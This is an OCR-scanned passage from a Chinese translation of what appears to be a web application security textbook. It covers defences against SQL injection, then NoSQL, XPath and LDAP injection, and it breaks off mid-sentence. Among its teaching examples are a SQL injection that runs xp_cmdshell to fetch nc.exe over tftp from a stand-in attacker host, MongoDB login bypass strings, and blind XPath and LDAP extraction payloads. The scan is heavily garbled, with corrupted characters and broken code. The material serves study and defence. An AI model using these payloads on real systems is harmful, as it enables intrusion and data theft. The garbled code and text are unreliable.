9.2.14 防止 SQL 注 入 


尽管 其 表现 形式 和 利用 手段 的 复 洒 程度 各 不 相同 ， 但 通常 而 言 ， 
SQL 广 入 仍然 是 最 容易 防御 的 漏洞 之 一 。 然 而 ， 关 于 SQL 注入 应 对 措 
施 的 讨论 经 党 造成 误导 ， 许 多 人 都 依赖 仅 部 分 有 效 的 防御 措施 。 

1. 部 分 有 效 的 防御 措施 

由 于 单 引 号 在 SQL 注入 漏洞 中 占有 突出 地 位 ， 防 御 这 种 攻击 的 一 
种 利用 方法 ， 束 是 将 用 户 输入 中 的 任何 单 引号 配对 ， 对 它们 进行 转 
义 。 但 是 ， 在 下 面 两 种 情况 下 ， 这 种 方法 无 效 。 

口 如果 用户 提 交 的 数 子 数据 内 置 在 SQL 查 询 中 ， 这 种 数据 通常 并 
不 包含 在 单 引号 内 。 因 此 ， 攻 击 者 能 够 破坏 数据 的 使 用 环境 并 开始 输 
入 任意 SQL 查询 ， 这 时 就 不 必 输 入 单 引 号 。 

口 在 二 阶 SQL 注 入 攻击 中 ， 最 初 在 插入 数据 库 中 时 已 经 安全 转 义 
的 数据 随后 被 从 数据 库 中 读 取出 来 ， 然 后 又 再 次 写 入 。 当 重新 使 用 数 
据 时 ， 最 初 配对 的 引号 又 恢复 到 单 引 号 形式 。 

另 一 种 常用 的 应 对 措施 是 使 用 存储 过 程 完 成 全 部 数据 库 访问 。 无 
疑 ， 定 制 的 存储 过 程 可 增强 安全 性 ， 提 高 性 能 ， 然 而 ， 由 于 两 方面 的 
原因 ， 它 们 并 不 能 保证 防止 SQL 漏洞 。 

口 如 在 使 用 Oracle 的 示例 中 所 见 ， 编 写 存在 缺陷 的 存储 过 程 可 能 
在 目 映 代码 中 包含 5QL 注 入 漏洞 。 在 存储 过 程 中 构建 SQL 语 句 时 也 可 
能 出 现 类 似 的 安全 问题 ， 使 用 存储 过 程 也 无 法 防止 漏洞 产生 。 


口 即 使 使 用 安全 可 靠 的 存储 过 程 ， 但 如 果 使 用 用 户 提交 的 输入 以 
不 安全 的 方式 调用 这 个 存储 过 程 ， 也 仍然 可 能 出 现 SQL 注 入 漏洞 。 例 
如 ， 假 设 用 户 注册 功能 在 一 个 存储 过 程 中 执行 ， 该 存储 过 程 通过 以 下 
方式 调用 : 
exec sp RegisterUser 'joe', 'secret' 


这 个 语句 和 一 个 简单 的 INSERT 语 句 一 样 易 于 受到 攻击 。 例 


foo'; exec master..xp_cmdshell 'tirp wahh-attacker.com GET nc.exe’' 
应 用 程序 将 执行 以 下 批量 查询 

exec sp_RegisterUser 'joe', ‘foo'; exec master..xp_cmdshell ‘tftp 

wahh-attacker.com GET ne.exe'--' 


因此 使 用 存储 过 程 并 没有 作用 。 

实际 上 ， 功 能 复杂 的 大 型 应 用 程序 需要 执行 成 千 上 万 条 不 同 的 
SQL 语 句 ， 许 多 开发 者 认为 ， 使 用 存储 过 程 重 复 执 行 这 些 语句 是 对 开 
发 时 间 的 不 合理 利用 。 
2. 参数 化 查询 

大 多 数 数 据 库 和 应 用 程序 开发 平台 都 提供 API， 对 不 可 信 的 输入 
进行 安全 处 理 ， 以 防止 SQL 注入 漏洞 。 参 数 化 查询 〈 也 叫 预 处 理 语 
句 ) 分 两 个 步骤 建立 一 个 包含 用 户 输 入 的 SQL 语句 。 

(1) 应 用 程序 指定 查询 结构 ， 为 用 户 输入 的 每 个 数据 预 留 占 位 
符 。 


(2) 应 用 程序 指定 每 个 占 位 符 的 内 容 。 

至 关 重 要 的 是 ， 在 第 二 个 步 又 中 指定 的 专门 设计 的 数据 无 法 破坏 
在 第 一 个 步骤 中 指定 的 查询 结构 。 因 为 查询 结构 已 经 确定 ， 且 相关 
API 对 所 有 类 型 的 占 位 符 数据 进行 安全 处 理 ， 因 此 它 总 被 解释 为 数 
据 ， 而 不 是 语句 结构 的 一 部 分 。 

下 面 的 两 个 代码 示例 说 明了 使 用 用 户 数据 动态 创建 的 一 个 不 安全 
查询 与 相应 的 参数 化 查询 之 间 的 差异 。 在 第 一 段 代 码 中 ， 用 户 提 区 的 
6 
注入 : 


String queryText = "select ename,sal from emp where ename ='"; 


第 二 段 代码 使 用 一 个 问号 作为 用 户 提交 参数 的 占 位 符 ， 以 确定 碍 
询 的 结构 。 随 后 ， 代 码 调用 prepareStatement 方 法 解释 这 个 参数 ， 并 确 
定 将 要 执行 的 查询 结构 。 之 后 ， 它 使 用 setString 方 法 指定 参数 的 实际 
值 。 由 于 查询 的 结构 已 经 固定 ， 这 个 值 可 为 任何 数据 类 型 ， 而 不 会 影 
响 查 询 的 结构 。 于 是 查询 得 以 安全 执行 : 


1 RLE 


String cueryText = "SELECT ename, sal FROM EMP WHERE ename = ?"; 


mm 


epareStatement {queryText); 


/7 通过 数据 库 连接 "con " 预 处 理 语 名 


on ,了 


stom 一 


/7 将 用 户 给 入 添加 到 变量 1 RFA GA?) 


stmt.setString{1, request.qetParameter ("name"})); 


TZ 注解 建立 参数 化 查询 实际 需要 的 方法 和 语法 因数 据 库 和 
应 用 程序 开发 平台 而 异 。 请 参阅 第 18 章 了 解 一 些 最 常用 的 示例 。 


eet re oa 但 还 要 注意 以 下 几 个 重要 的 限 
| o 

口 应 在 每 一 个 数据 库 查 询 中 使 用 参数 化 查询 。 我 们 发 现 ， 在 开发 
应 用 程序 的 过 程 中 ， 对 于 每 一 个 查询 ， 开 发 者 都 要 判断 是 否 使 用 参数 
化 查询 。 如 果 明 显要 应 用 用 户 提交 的 输入 ， 就 使 用 参数 化 查询 ; 否则 
束 不 使 用 。 这 种 方法 是 造成 许多 SQL 注 入 漏洞 的 根源 所 在 。 首 先 ， 仪 
注意 由 用 户 直接 提交 的 输入 ， 二 阶 攻 击 就 很 容易 被 忽略 ， 因 为 已 经 被 
处 理 的 数据 被 认为 是 可 信和 的 。 其 次 ， 在 处 理 用 户 可 控制 的 数据 这 种 特 
殊 的 情况 下 ， 我 们 很 容易 犯错 。 在 大 型 应 用 程序 中 ， 各 种 数据 项 被 保 
存在 会 话 中 ， 或 者 由 客户 端 提 交 。 其 他 人 可 能 并 不 知道 开发 者 作出 的 
假设 。 特 殊 数据 的 处 理 方式 将 来 可 能 发 生 改 变 ， 在 以 前 安全 的 查询 中 
T h aG 。 因 此 ， 规 定 在 整个 应 用 程序 中 都 使 用 参数 化 查询 

人 


口 插入 查询 中 的 每 一 种 数据 都 应 适当 进行 参数 化 。 我 们 遇 到 过 许 
多 这 样 的 示例 : 查询 中 的 大 多 数 参 数 都 得 到 安全 处 理 ， 然 而 ， 有 一 两 
个 数据 项 可 直接 连接 到 用 于 指定 查询 结构 的 字符 串 中 。 如 果 以 这 种 方 
式 处 理 某 些 参数 ， 即 使 使 用 参数 化 查询 ， 也 无 法 防止 SQL 注入 。 

口 参 数 占 位 符 不 能 用 于 指定 查询 中 表 和 列 的 名 称 。 在 极 少数 情况 
下 ， 应 用 程序 需要 根据 用 户 提 交 的 数据 在 一 个 SQL 查询 中 指定 这 些 数 
据 项 。 当 遇 到 这 种 情况 时 ， 最 好 使 用 一 份 由 已 知 可 靠 的 值 组 成 的 * 白 名 
单 ”〈 即 数据 库 实际 使 用 的 表 和 列 名 单 ) ， 并 拒绝 任何 与 这 份 名单 上 的 
数据 不 匹配 的 输入 项 。 如 果 无 法 做 到 这 一 点 ， 束 应 对 用 户 输 入 实施 严 
格 的 确认 机 制 ， 例 如 ， 只 人 允许 字母 数字 字符 (不 包括 空白 符 ) ， 并 执 
行 适当 的 长 度 限 制 。 

口 参数 占 位 符 不 能 用 于 查询 的 任何 其 他 部 分 ， 如 ORDER BY 子 句 
中 的 ASC 或 DESC 关 键 字 ， 或 任何 其 他 SQL 关 键 字 ， 因 为 它们 属于 查询 
结构 的 一 部 分 。 与 表 和 列 名 称 一 样 ， 如 果 需 要 基于 用 户 提 交 的 数据 指 
Boer eee Me Eee apa eee 


3. 深层 防御 

通常 ， 一 种 稳定 的 安全 机 制 应 采用 深层 防御 措施 提供 额外 的 保 
护 ， 以 防止 前 端 防 箱 由 于 任何 原因 失效 。 当 防御 针对 后 端 数据 库 的 攻 
击 时 ， 应 采用 另外 三 层 防 御 。 

口 当 访问 数据 库 时 ， 应 用 程序 应 尽 可 能 使 用 最 低 权限 的 账户 。 
般 情 况 下 ， 应 用 程序 并 不 需要 数据 库 管 理 员 权限 ， 它 只 需要 读 取 并 写 
入 目 己 的 数据 。 在 注重 安全 的 情况 下 ， 应 用 程序 可 以 使 用 另 一 个 数据 
库 账 户 执行 各 种 操作 。 例 如 ， 如 果 90% 的 数据 库 查 询 只 需要 读 取 访 
问 ， 就 可 以 使 用 一 个 并 不 具有 写 入 权限 的 账户 执行 这 些 查询 。 如 果 某 
个 查询 只 需要 读 取 一 部 分 数据 〈 例 如 ， 读 取 订 单 表 而 不 是 用 户 账户 
表 ) ， 这 时 就 可 以 使 用 一 个 拥有 相应 访问 权限 的 账户 。 如 果 可 以 在 整 
个 应 用 程序 中 实施 这 种 方法 ， 吏 可 以 降低 任何 剩余 SQL 注入 漏洞 给 应 
用 程序 造成 的 影响 。 

口 许多 企业 数据 库 包含 大 量 默认 功能 ， 可 被 能 够 执行 任意 SQL 语 
名 的 攻击 者 利用 。 如 有 可 能 ， 应 删除 或 禁用 不 必要 的 功能 。 即 使 有 时 
候 技 术 熟 练 、 蕾 意 破 坏 的 攻击 者 能 够 通过 其 他 方法 重新 建立 一 些 必需 
的 功能 ， 但 做 到 这 一 点 通常 需要 复杂 的 操作 ， 而 且 数 据 库 实施 的 强化 
措施 也 会 给 攻击 者 造成 难以 逾越 的 障碍 。 


口 应 评估 、 测 试 并 及 时 安装 供应 两 发 布 的 所 有 安全 补丁 ， 以 修复 
数据 库 软 件 本 身 已 知 的 漏洞 。 在 注重 安全 的 情况 下 ， 数 据 库 管理 员 可 
以 使 用 各 种 预订 服务 (subscriber-based service) 提前 了 解 一 些 供应 商 
尚未 公布 补丁 的 已 知 漏洞 ， 及 时 采取 适当 的 防御 措施 。 


9.3 YEANoSQL 


术语 NoSQL 用 于 指 各 种 不 同 于 标准 的 关系 数据 库 体系 架构 的 数据 
存储 区 。NoSQL 数 据 存 储 区 呈现 使 用 键 / 值 映射 的 数据 ， 并 且 不 依赖 于 
固定 的 方案 ， 如 传统 的 数据 库 表 。 键 和 值 可 以 任意 定义 ， 而 且 值 的 格 
式 通 篆 与 数据 存储 区 无 天 。 键 / 值 存储 的 男 一 个 特点 在 于 ， 值 可 能 为 数 
ER tardenen eee Dae 
月 结构 不 同 。 

文 持 上 述 数据 存储 的 NoSQL 具 有 各 方面 的 优势 ， 这 些 优 势 主 要 体 
现在 处 理 庞大 的 数据 集 方面 ， 以 便于 根据 需要 对 数据 存储 区 中 的 层次 
化 数据 进行 优化 ， 以 减少 检索 数据 集 的 开销 。 在 这 些 情况 下 ， 传 统 的 
SELB I RE Se I EET ARES GF, Vee RS Bae Ts 


从 Web 应 用 程序 安全 的 角度 看 ， 我 们 主要 关注 应 用 程序 如 何 查 询 
数据 ， 因 为 这 决定 了 攻击 者 可 以 进行 何 种 形式 的 注入 。 就 SQL 注入 而 
言 ， 不 同 数据 库 产 品 采用 的 SQL 语言 大 体 相 似 。 相 反 ，NoSQL 代 表 痢 
一 类 全 新 的 数据 存储 区 ， 它 们 的 行为 各 不 相同 。 而 且 ， 它 们 并 非 全 都 
使 用 单一 的 查询 语言 。 

以 下 是 NoSQL 数 据 存储 区 采用 的 一 些 常用 的 人 查询 方法 : 

口 键 / 值 查 询 ; 

O XPath 〈 将 在 本 章 后 面部 分 介绍 ) ; 

口 编程 语言 (如 JavaScript) ° 

NoSQL 是 一 种 快速 发 展 的 相对 较 新 的 技术 。 与 SQL 等 比较 成 熟 的 
技术 不 同 ， 它 并 没有 进行 大 规模 地 部 署 。 因 此 ， 对 于 NoSQL 相 天 漏洞 
的 研究 仍 处 于 早期 阶段 。 此 外 ， 由 于 许多 NoSQL 技 术 访 问 数据 的 方式 
十 分 简单 ， 讨 论 注 入 NoSQL 数 据 存储 区 的 示例 有 时 明显 是 虚构 的 。 

几乎 可 以 肯定 的 是 ， 当 前 和 将 来 的 web 应 用 程序 使 用 NoSQL 数 据 
存储 区 的 方式 将 存在 可 被 利用 的 漏洞 。 我 们 将 在 下 一 市 中 讨论 一 个 这 
样 的 示例 ， 该 示例 源 于 真实 的 应 用 程序 。 
注入 MongoDB 

许多 NoSQL 数 据 库 利 用 现 有 的 编程 语言 来 提供 灵活 、 可 编程 的 碍 
询 机 制 。 如 有 果 使 用 字符 串 连 搂 构 建 查 询 ， 攻 击 者 就 可 以 演 试 破坏 数据 
并 更 改 查 询 的 语法 。 以 下 面 的 查询 为 例 ， 它 基于 MongoDB 数 据 存储 区 
中 的 用 户 记录 进行 登录 : 


$ 
$db m->emsdb 
Sco ion - 
$js = une n 

return this.username == '$username' & this.password == 'Spassworc'; }"; 
Sobj = $collection->findOne(array('Swhere' => $js)); 

if bj [ i 

$l ain 
else 


Slogged_in=0; 
$js 是 一 个 JavaScript 函 数 ， 其 代码 是 动态 构建 的 ， 并 且 包 含 用 户 提 
交 的 用 户 名 和 密码 。 攻 击 者 可 以 通过 提供 以 下 用 户 名 和 任意 密码 来 避 
开 验 证 逻辑 : 


Marcus'// 


生成 的 JavaScript 函 数 如 下 所 示 : 


{ re 1 this.username == ‘Marcus'//' & this.password == ‘aaa'; } 


TER 在 JavaScript 中 ， 双 正 斜 杜 (/) 表示 行 尾 注释 ， 因 


此 ， 画 数 中 的 剩余 代码 将 被 注释 掉 。 
另 一 种 不 使 用 注释 而 确保 $s 函数 始终 返回 “ 真 * 的 方法 ， 是 提供 
以 下 用 户 名 ; 


a | | | | Ve See 


JavaScript 以 如 下 方式 解释 各 种 运算 符 : 


(this.username == 'a' || l==1) || ('a'==s'a' & this.password == 


aa'); 


这 将 匹配 用 户 集 合 中 的 所 有 资源 ， 因 为 第 一 个 选择 性 条 件 始终 
为 真 (1 始终 等 于 1) 。 


9.4 注入 XPath 


XPath (XML 路 径 语言 ) 是 一 种 用 于 导航 XML 文档 并 从 中 获取 数 
据 的 解释 型 语言 。 许 多 时 候 ， 一 个 XPath 表达 式 代 表 由 一 个 文档 节点 导 
航 到 另 一 个 文档 节点 所 需要 的 一 系列 步骤 © 

如 果 Web 应 用 程序 将 数据 保存 在 XML 文档 中 ， 那 么 它们 可 能 使 用 
XPath 访问 数据 ， 以 响应 用 户 提 交 的 输入 。 如 果 这 个 输入 未 经 任何 过 滤 
或 净化 就 插入 到 XPath 查询 中 ， 攻 击 者 就 可 以 通过 控制 查询 来 破坏 应 用 
程序 的 逻辑 ， 或 者 获取 未 获 授权 访问 的 数据 。 

通常 ，XML 文档 并 不 是 保存 企业 数据 的 首选 工具 。 但 是 ， 它 们 常 
常 被 用 于 保存 可 根据 用 户 输 入 获取 的 应 用 程序 配置 数据 。 小 型 应 用 程 
序 也 使 用 它们 保存 简单 的 信息 ， 如 用 户 证 书 、 角 色 和 权限 。 以 下 面 的 
XML 数据 为 例 : 


<addressBook> 

<address> 
<firstName>William</firstName> 
<surname>Gates</surname> 
<password>MSRocks !</password> 
<email>billyg@microsoft.com</email> 
<ccard>5130 8190 3282 3515</ccard> 

</address> 

<address> 
<firstName>Chris</firstName> 
<surname>Dawes</surname> 
<password>secret</password> 
<email>cdawes@craftnet .de</email> 
<ccard>3981 2491 3242 3121</ccard> 

</address> 

<address> 
<firstName>James</firstName> 
<surname>Hunter</surname> 
<password>letmein</password> 
<email>james.hunter@pookmail.com</email> 
<ccard>8113 5320 8014 3313</ccard> 

</address> 

</addressBook> 


一 个 获取 所 有 电子 邮件 地 址 的 XPath 得 询 如 下 : 


//address/email/text() 
一 个 返回 Dawes 的 全 部 用 户 资料 的 查询 为 : 
//address [surname/text()='Dawes'] 


在 一 些 应 用 程序 中 ， 用 户 提 交 的 数据 可 被 直接 岁入 到 XPath 查 询 
中 ， 查 询 的 结果 可 能 在 应 用 程序 的 响应 中 返回 ， 或 者 用 于 决定 应 用 程 
序 某 些 方面 的 行为 。 


9.4.1 ”破坏 应 用 程序 逻辑 


以 一 个 根据 用 户 名 和 密码 获得 用 户 保 存 的 信用 卡号 码 的 应 用 程序 
功能 为 例 。 下 面 的 XPath 碍 询 核实 用 户 提交 的 证 书 ， 并 获取 相关 用 户 的 
信用 卡号 码 : 


raGGress [surname/text(}= 


‘Dawes' and passworc/text()='secret'] /ccarc/ 


ext (} 


与 利用 SQL 注入 漏洞 一 样 ， 这 时 攻击 者 也 可 以 破坏 应 用 程序 的 查 
询 。 例 如 ， 提 交 密 码 值 


将 导致 下 面 的 XPath 查询 ， 获 取 所 有 用 户 的 信用 卡 信息 : 


//adaGress [(surmame/text()='Dawes' and password/text() ' or tateta'j/ 


nm reas au 
ccard/text () 


—/ 注解 
“ 口 与 SQL 注入 一 样 ， 注 入 一 个 数字 值 时 不 需要 单 引号 。 


口 与 SQL 查 询 不 同 ，XPath 查 询 中 的 关键 字 区 分 大 小 写 ，XMIL 
文档 中 的 元 素 名 也 区 分 大 小 写 。 


9.4.2 ”说 慎 XPath 注 入 


攻击 者 可 利用 XPath 注 入 漏洞 从 目标 XML 文 档 中 获取 任意 信息 。 
获取 信息 的 一 种 可 靠 途 径 是 使 用 和 上 述 SQL 注 入 时 相同 的 技巧 ， 促 使 
应 用 程序 根据 攻击 者 指定 的 条 件 以 不 同 的 方式 做 出 啊 应 。 

提交 以 下 两 个 密码 将 导致 应 用 程序 的 不 同行 为 : 第 一 种 情况 返回 
结果 ， 但 第 二 种 情况 不 返回 结 


"J a 
t or i=? end. “S"="S 


这 种 行为 老 ESER] A TANET RR 件 的 真 假 ， 因 此 可 通过 它 一 
次 一 个 字 世 地 提取 出 任意 信息 。 与 SQL 一 样 ，XPath 语 言 也 包含 一 个 子 
字符 串 函 数 ， 可 用 它 一 次 一 个 字符 地 测试 一 个 字符 串 的 值 。 例 如 ， 提 
交 密 码 


' or //address[surname/text{)='Gates' and substring {password/text{),1,1) 


"MT and ‘a‘=‘a 


将 导致 下 面 的 XPath 得 询 ， 如 有 果 用 户 Gates 密 码 的 第 一 个 字符 为 M， 将 
返回 查询 结果 : 


/ ¿address [surname/ text [)='Dawes' and password/text()='' or 
/f/adéress|surname/text()='Gates' and substring{password/text(}),1,1})= 'M'] 
and ‘a'='a ']/ccard/text() 


EO TL ET BES FFF i BSP EY BEA, DCT LB Ae IRS 
Gates 的 完整 密码 。 


尝试 访问 


http://mdsec.net/cclookup/14/ 


9.4.3 ”盲目 XPath 注入 


在 前 面 的 攻击 中 ， 注 入 的 测试 条 件 指定 了 提取 数据 的 绝对 路 径 
(address) 以 及 目标 字段 的 名 称 (surname 和 password) ° ÆRE, EP 
使 不 了 解 这 些 信 息 ， 攻 击 者 仍 有 可 能 发 动 完 全 盲目 的 攻击 。XPath 碍 询 
可 包含 与 XML 文档 中 当前 节点 有 关 的 步 又， 因此， 从 当前 节点 可 以 导 
航 到 父 太 点 或 一 个 特定 的 子 节 点 。 男 外 ，XPath 包 含 可 查询 文档 元 信息 
(包括 特殊 元 素 的 名 称 ) 的 函数 。 使 用 这 些 技巧 就 可 以 提取 出 文档 中 
a een 

例如 ， 可 以 使 用 前 面 描述 的 子 字 符 串 技巧 ， 通 过 提交 如 下 格式 的 
密码 ， 提 取 当 前 节点 的 父 节 点 的 名 称 : 


' or substring(name(parent::*[position()=1]),1,1)= ‘a 


这 个 输入 能 够 返回 结果 ， 因 为 address 节 点 的 第 一 个 字母 为 a。 轮 到 
第 二 个 字母 ， 这 时 可 以 通过 提交 下 列 密码 确定 该 字母 为 6， 因为 最 后 一 
个 输入 返回 了 结 采 : 


' or substring(name(parent::* 


[position()=1))},2,1)=‘a 
' or substring (name(parent::*[position()=1])},2,1)='b 
' or substring (name (parent: :*[position()=1]},2,1)='c 

sawe 站 


' or substring (name (parent::*[position()=1] 


确定 address 世 点 的 名 称 后 ， 攻 击 者 束 可 以 轮流 攻击 它 的 每 一 个 子 
节点 ， 提 取出 它们 的 名 称 与 值 。 通 过 索引 指定 相关 子 下 点 可 不 必 知 道 
任何 市 点 的 名 称 。 例 如 ， 下 面 的 查询 将 返回 值 Hunter: 


/f/address [position(}-3]/child: :node({) [position()=4] /text!() 


而 下 面 的 查询 返回 值 letmein: 


//address[position(}=3] /child: :node(}) [position()=6]/text({} 


这 种 扩 巧 可 用 在 完全 言 目 的 攻击 中 ， 这 时 应 用 程序 在 啊 应 中 不 返 
回 任何 结果 ， 我 们 可 以 设计 一 个 注入 的 条 件 ， 通 过 索引 指定 目标 市 
上 护 。 例 如 ， 如 采 Gates 密 码 的 第 一 个 字母 为 M， 提 交 下 面 的 密码 将 返回 


< 
结 示 : 


' or substring(//address[position()=1]/child: :node() [position{)})=6]/ 
text(),1,1)= 'M' and ‘a'’=‘a 


轮流 攻击 每 个 地 址 节点 的 每 个 于 节点 ， 并 一 次 一 个 字符 地 提取 出 
它们 的 值 ， 攻 击 者 束 可 以 提取 整个 XML 数 据 的 内 容 。 


YV ”提示 XPath 中 有 两 个 有 用 的 画 数 ， 可 帮助 自动 完成 上 述 攻 
击 ， 迅 速 笛 历 XML 文 档 中 的 所 有 节点 和 数据 。 


Dcount O 。 这 个 函数 返回 指定 元 素 的 子 节 点 数量 ， 可 用 于 确 
定 需 要 遍历 的 position () 值 的 范围 。 

口 string-length () 。 这 个 函数 返回 一 个 已 提交 字符 串 的 长 度 ， 
可 用 于 确定 需要 遍历 的 substring O 值 的 范围 。 


尝试 访问 


http://mdsec.net/cclookup/19/ 


9.4.4 ”查找 XPath 注入 漏洞 


许多 单 用 于 探查 SQL 注入 漏洞 的 攻击 字符 串 如 果 被 提交 给 一 个 易 
于 受到 XPath 注 入 的 函数 ， 往 往 会 导致 反 篆 行 为 。 例 如 ， 下 面 的 两 个 字 
符 会 破坏 XPath 查询 的 语法 ， 从 而 造成 错误 : 


通常 ， 与 在 SQL 注入 漏洞 中 一 样 ， 下 面 的 一 个 或 几 个 字符 串 将 会 
引起 应 用 程序 的 行为 发 生变 化 ， 但 不 会 造成 错误 : 
了 or 'a I = I a 
' aha ta sib 
ör LS 
aria. 1=2 
因此 ， 任 何 时 候 ， 如 果 在 探查 SQL 注入 过 程 中 发 现 一 个 漏洞 的 初 


步 证 据 ， 但 却 无 法 对 该 漏洞 加 以 利用 ， 那 么 过 到 的 可 能 束 是 XPath 注入 
漏洞 。 


渗透 测试 步骤 


” “(1 笑 试 提交 下 面 的 值 ， 并 确定 它们 是 否 会 导致 应 用 程序 的 
行为 发 生 改 变 ， 但 不 会 造成 错误 : 

' or count (parent::* [position()=1] 

' or count (parent::*[position()=1] 


=O Or ‘ate tb 
=O ‘or "“at="b 


) 
) 


如 采 参 数 为 数 子 ， 笑 试 提交 下 面 的 测试 字符 串 : 


1 or count (parent: :*[position()=1])=0 
1 or count (parent: :*[position()=1])>0 


(2) 如 果 上 面 的 任何 字符 串 导 致 应 用 程序 的 行为 发 生 改 变 ， 
但 不 会 造成 错误 ， 很 可 能 可 以 通过 设计 测试 条 件 ， 一 次 提取 一 个 字 
节 的 信息 ， 从 而 获取 任意 数据 。 使 用 一 系列 以 下 格式 的 条 件 确定 当 
BUT AAI SOT AA 4 BR: 


substring (name(parent::*[position{)=1]}),1,1}='a' 


(3) 提取 出 父 节 点 的 名 称 后 ， 使 用 一 系列 下 面 格式 的 条 件 提 
取 XML 树 中 的 所 有 数据 : 


substring(//parentnodename[position()=1]/child: :node() 
[position()=1]/text(),1,1)='a' 


9.4.5 ”防止 XPath 注入 


如 宁 觉 得 必须 在 一 个 XPath 碍 询 中 插入 用 户 提交 的 输入 ， 应 该 只 提 
区 可 实施 严格 输入 确认 的 简单 数据 。 应 根据 一 份 由 可 接受 字符 组 成 
的 “日 名 单 " 检 查 用 户 输入 ， 其 中 最 好 只 包括 字母 数字 字符 。 应 阻止 任 
何 可 能 破坏 XPath 查 询 的 字符 , 包括 ( ) = ' [ J]: , * /和 所 
有 空 日 符 。 直 接 拒绝 而 不 是 当 化 任何 与 日 名 单 不 匹配 的 输入 。 


9.5 注入 LDAP 


LDAP (Lightweight Directory Access Protocol， 轻 量 级 日 录 访 问 协 
议 ) 用 于 访问 网 络 中 的 目录 服务 。 目 录 是 一 个 分 级 结构 的 数据 存储 
区 ， 其 中 可 能 包含 任何 类 型 的 信息 ， 但 常用 于 保存 个 人 信息 ， 如 姓 
名 、 电 话 号 码 、 电 子 邮 件 地 址 和 工作 职能 等 。Windows 域 中 使 用 的 
Active Directory 就 是 这 种 目录 的 一 个 典型 示例 。LDAP 还 常用 在 企业 内 
x 如 允许 用 户 查 看 并 修改 雇员 信息 的 人 力 资 源 应 
用 程序 。 

每 个 LDAP 碍 询 使 用 一 个 或 多 个 搜索 过 滤 需 ， 它 们 决定 了 请 求 返 
回 的 目录 项 。 搜 索 过 滤 例 可 以 使 用 各 种 逻辑 运算 和 从 来 表示 复杂 的 搜索 
条 件 。 最 常用 的 搜索 过 滤器 如 下 。 

口 简 单 匹 配 条 件 (simple match conditions) 对 单个 属性 的 值 进行 
匹配 。 例 如 ， 通 过 用 户 名 搜索 用 户 的 应 用 程序 函数 可 能 使 用 以 下 过 滤 


HH 


ar: 
(username=da f) 


口 析 取 查询 (disjunctive queries) 指定 多 个 条 件 ， 返 回 的 目录 项 必 
须 满 足 其 中 任何 一 个 条 件 。 例 如 ， 在 多 个 目录 属性 中 查找 用 户 提供 的 
搜索 项 的 搜索 函数 可 能 使 用 以 下 过 滤 壤 : 


(| (cn=searchterm) (sn=searchterm) (ou=searchterm) ) 


oO ERAH (conjunctive queries) 指定 多 个 条 件 ， 返 回 的 目录 项 
必须 满足 所 有 这 些 条 件 。 例 如 ，LDAP 中 实施 的 登录 机 制 可 能 使 用 以 
FIER: 


(&(username=daf) (password=secret) 


和 其 他 形式 的 注入 一 样 ， 如 采用 户 提 区 的 输入 不 经 任何 确认 即 被 
插入 到 LDAP 搜 索 过 滤 絮 中， 攻击 者 束 可 以 通过 提交 专 | 设计 的 输入 
来 修改 过 滤 句 的 结构 ， 以 检索 数据 或 执行 未 授权 操作 。 

一 般 而 言 ， 与 SQL 注入 漏洞 相 比 ，LDAP 注 入 漏洞 更 难以 被 攻击 者 
利用 ， 原 因 如 下 。 

口 搜索 过 滤 铸 采用 逻辑 运算 符 来 指定 析 取 或 合 取 碍 询 的 位 置 通 冲 
位 于 用 户 提交 的 数据 的 插入 位 置 之 前 ， 因 而 无 法 被 修改 。 因 此 ， 人 简单 
匹配 条 件 和 合 取 查询 不 会 受 与 SQL 注入 类 似 的 “or 1=1” 类 型 的 攻击 。 


口 在 常用 的 LDAP 服 务 中 ， 返 回 的 目录 属性 将 作为 搜索 过 滤器 中 的 
独立 参数 传递 给 LDAP API， 并 且 通 常 在 应 用 程序 中 进行 了 人 硬 编码 。 因 
此 ， 攻 击 者 无 法 通过 修改 用 户 提 交 的 输入 来 检索 与 查询 检索 的 属性 不 
同 的 属性 。 

口 应 用 程序 很 少 返 回 有 用 的 错误 消息 ， 因 此 ， 通 常 攻击 者 只 能 “ 盲 
目 ” 利 用 各 种 漏洞 。 


9.5.1 利用 LDAP 注 入 


尽管 存在 上 述 限 制 ， 但 在 许多 情况 下 ， 攻 击 者 仍然 可 以 利用 
LDAP 注 入 漏洞 从 应 用 程序 中 获取 数据 ， 或 执行 未 授权 操作 。 通 常 ， 
实施 这 类 攻击 的 方法 与 搜索 过 小 妮 的 结构 、 用 户 输 入 的 进入 点 ， 以 及 
后 端 LDAP 服 务 本 身 的 执行 细节 密切 相关 。 
1. 析 取 查询 

以 允许 用 户 查看 指定 业务 部 门 的 雇员 的 应 用 程序 为 例 。 其 搜索 结 
果 仪 限于 用 户 获 得 授权 可 以 查看 的 地 理 区 域 。 例 如 ， 如 果 一 名 用 户 获 
得 授权 可 以 查看 伦敦 和 雷 丁 地 区 ， 并 且 他 搜索 的 是 “销售 ”部门 ， 应 用 
程序 将 执行 以 下 析 取 查询 : 


{| (department=London sales) (department=Reading sales)) 


这 里 ， 应 用 程序 构建 了 一 个 析 取 查询 ， 并 在 用 户 提交 的 输入 之 前 
前 置 了 一 些 表 达 式 来 执行 所 需 的 访问 控制 。 

在 这 种 情况 下 ， 攻 击 者 可 以 通过 提交 以 下 搜索 项 对 查询 进行 修 
改 ， 以 返回 所 有 地 区 的 所 有 雇员 的 资料 : 


) (department=* 


* 字 符 征 LDAP 中 的 通配符 ， 可 匹配 任何 数据 项 。 如 果 将 这 个 输入 
舱 入 LDAP 搜 索 过 滤 右 中 ， 应 用 程序 将 执行 以 下 查询 : 


{| (department-London {departmen ) (department-Reacing } (department-*) 


由 于 这 是 一 个 析 取 得 询 并 且 包 含 通配符 搜索 项 
(department=*) ， 因 此 ， 它 会 对 所 有 目录 项 进行 匹配 。 它 会 返回 所 
有 地 区 的 所 有 员工 的 资料 ， 从 而 突破 应 用 程序 的 访问 控制 。 


尝试 访问 


http://mdsec.net/employees/31/ 
http://mdsec.net/employees/49/ 


2. ARAH 

这 里 我 们 以 另 一 个 类 似 的 应 用 程序 为 例 ， 同 样 ， 该 应 用 程序 允许 
用 户 按 姓名 在 授权 查看 的 地 理 区 域内 搜索 雇员 。 

如 果 用 户 获得 授权 可 以 在 伦敦 进行 搜索 ， 并 且 它 搜索 姓名 daf， 则 
应 用 程序 将 执行 以 下 查询 : 


(& {givenName=daf) (department=London*)) 


这 里 ， 用 户 的 输入 被 插入 到 合 取 查询 中 ， 该 查询 的 第 二 部 分 仅 通 
过 匹配 其 中 一 个 伦敦 部 门 的 数据 项 来 执行 所 需 的 访问 控制 。 

在 这 种 情况 下 ， 根 据 后 端 LDAP 服 务 的 执行 细节 ， 攻 击 者 可 以 成 
